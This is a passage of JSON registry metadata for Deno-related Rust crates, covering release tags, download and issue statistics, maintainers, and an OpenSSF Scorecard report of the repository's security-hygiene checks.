nd%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T15:40:53.686Z","dependent_packages_count":0,"downloads":4437,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.7596418936946,"dependent_repos_count":24.440162452198145,"dependent_packages_count":32.41514244211899,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.87164892933725},"purl":"pkg:cargo/lib_node_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/lib_node_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/lib_node_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/lib_node_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_node_resolver/codemeta","maintainers":[{"uuid":"300816","login":"carloslfu","name":"Carlos Galarza","email":null,"url":"https://github.com/carloslfu","packages_count":8,"html_url":"https://crates.io/users/carloslfu","role":null,"created_at":"2024-11-20T17:46:56.757Z","updated_at":"2024-11-20T17:46:56.757Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/carloslfu/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14712020,"name":"deno_print","ecosystem":"cargo","description":"Print macros that don't panic on broken pipes, for Deno crates","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":6,"first_release_published_at":"2026-07-03T09:38:50.220Z","latest_release_published_at":"2026-08-27T15:22:36.446Z","latest_release_number":"0.6.0","last_synced_at":"2026-09-07T22:57:44.516Z","created_at":"2026-07-03T12:30:22.066Z","updated_at":"2026-09-08T19:46:54.709Z","registry_url":"https://crates.io/crates/deno_print/","install_command":"cargo install deno_print","documentation_url":"https://docs.rs/deno_print/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies 